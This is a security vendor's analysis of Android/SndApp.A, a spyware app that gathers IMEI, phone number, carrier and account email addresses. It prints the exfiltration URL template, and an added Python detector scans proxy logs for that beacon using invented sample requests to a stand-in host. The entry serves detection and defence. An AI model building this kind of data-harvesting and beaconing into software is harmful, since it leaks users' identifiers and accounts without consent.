
Android/SndApp.A!tr.spy - Released Sep 22, 2011 - Last Updated Sep 26, 2011

Alias/es

Spyware:Android/SndApps.A (F-Secure), Android.Snadapps (Symantec)

Detection Availability

                    Active Database    Extended Database
FortiGate (low)
FortiGate (high)
FortiClient
FortiMail           N/A

Visible Symptoms

Detailed Analysis

Android/SndApp.A!tr.spy targets Android mobile phones. It sends several pieces of personal information, including the victim's email addresses, to a remote web server.

The application displays a splash screen such as Figure 1.

Figure 1. Splash screen for Android/SndApp.A!tr.spy

If you press the icon in the top right corner, a list of affiliate apps is shown (see Figure 2). Those applications come from the same developer and show the same information-leaking behaviour.

Figure 2. Affiliate applications
Those applications have been removed from the Android Market.



Technical Details


When the malware is launched, it collects:
  • the phone's IMEI
  • the phone number
  • the network country ISO code (e.g. "fr")
  • the operator's name
  • the accounts registered on the phone. These are all the web accounts the end user has had the phone remember so that credentials need not be re-entered at each login: for instance Google accounts, Facebook accounts, e-commerce accounts, etc.
  • the victim's email addresses. These are not collected separately; they are derived from the login names of the accounts above. Whenever a login name looks like an email address (i.e. it contains an "@"), the malware assumes it is one and collects it.
On the Android versions current at the time, reading the IMEI and phone number requires the READ_PHONE_STATE permission and enumerating the registered accounts requires GET_ACCOUNTS, so an application with this behaviour must request both in its manifest.
This information is sent to a remote web site:
http://[REMOVED].com/android-notifier/notifier.php?
   appId=1&deviceId=IMEI&mobile=PHONENUMBER&country=ISOCOUNTRY
   &carrier=OPERATORNAME&email=EMAILS
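The exfiltration request above is easy to pick out of proxy or web-server logs because both the path and the parameter set are fixed. The following Python script, added here as an example and not part of the Fortinet write-up, scans constructed proxy log lines for that beacon and extracts the identifiers that left the device. The host name, IMEI, phone number, carrier and email addresses in the sample are invented, the log line format (timestamp, client IP, method, URL) is an assumption, and the final helper mirrors the "@ in the login name" heuristic described above so an analyst can tell which account names on a device would have been leaked.

```python
"""Find Android/SndApp.A beacons in web-proxy logs and list what leaked.

Added example, not part of the Fortinet analysis. Detection keys only on
what the analysis documents: the /android-notifier/notifier.php path and
the appId/deviceId/mobile/country/carrier/email query parameters.
"""
from urllib.parse import urlsplit, parse_qs

# Path and parameter names of the beacon, as documented in the analysis.
EXFIL_PATH = "/android-notifier/notifier.php"
EXFIL_PARAMS = {"appId", "deviceId", "mobile", "country", "carrier", "email"}

# Constructed sample log lines: "<timestamp> <client ip> <method> <url>".
# The host, IMEI, number, carrier and addresses are invented for this example.
# Line 2 is a beacon from a device with no number and no accounts (blank values).
# Lines 3 and 4 are near-misses that must not be flagged.
SAMPLE_LOG = """\
2011-09-22T10:14:03Z 10.0.0.23 GET http://example-c2.com/android-notifier/notifier.php?appId=1&deviceId=356938035643809&mobile=%2B33612345678&country=fr&carrier=Example%20Telecom&email=alice%40gmail.com%2Calice.w%40example.org
2011-09-22T10:14:05Z 10.0.0.23 GET http://example-c2.com/android-notifier/notifier.php?appId=1&deviceId=356938035643809&mobile=&country=fr&carrier=Example%20Telecom&email=
2011-09-22T10:15:11Z 10.0.0.42 GET http://www.example.com/notifier.php?appId=1
2011-09-22T10:16:40Z 10.0.0.42 GET http://cdn.example.net/android-notifier/notifier.php
"""


def is_exfil_request(url):
    """True if the URL has the beacon path and the complete parameter set.

    keep_blank_values matters: a device with no SIM number or no accounts
    still sends 'mobile=' and 'email=', and those requests are still leaks.
    """
    parts = urlsplit(url)
    if not parts.path.endswith(EXFIL_PATH):
        return False
    params = set(parse_qs(parts.query, keep_blank_values=True))
    return EXFIL_PARAMS <= params


def leaked_fields(url):
    """Return the identifiers carried by one beacon, percent-decoded."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)

    def first(key):
        return q.get(key, [""])[0]

    # The malware joins several addresses with commas; drop empty entries.
    emails = [e for e in first("email").split(",") if e]
    return {
        "imei": first("deviceId"),
        "phone": first("mobile"),
        "country": first("country"),
        "carrier": first("carrier"),
        "emails": emails,
    }


def scan_log(text):
    """Return a list of (timestamp, client_ip, leaked_fields) for every beacon."""
    hits = []
    for line in text.splitlines():
        try:
            ts, client, _method, url = line.split(maxsplit=3)
        except ValueError:
            continue  # malformed or truncated line; skip it
        if is_exfil_request(url):
            hits.append((ts, client, leaked_fields(url)))
    return hits


def emails_from_accounts(account_names):
    """Reproduce the malware's heuristic: any login name containing '@' is treated as an email."""
    return [name for name in account_names if "@" in name]


if __name__ == "__main__":
    for ts, client, fields in scan_log(SAMPLE_LOG):
        print(ts, client, "IMEI", fields["imei"], "phone", fields["phone"] or "-",
              "emails", ",".join(fields["emails"]) or "-")
```

Matching on the full parameter set rather than the path alone keeps the rule from firing on unrelated `notifier.php` endpoints, while still catching beacons whose values are blank. Once the real host name is known, adding it to the condition gives a tighter rule; the analysis redacts it, so the example does not hard-code one.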
When the icon for affiliate applications is pressed, the malware issues several requests to:
http://[REMOVED]ck66.com/mt/w264y234e4z2y2/&subid1=inapp
which redirects to the related applications.

Recommended Action

    FortiGate Systems

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.

    FortiClient Systems

  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Reference: ID - 3148366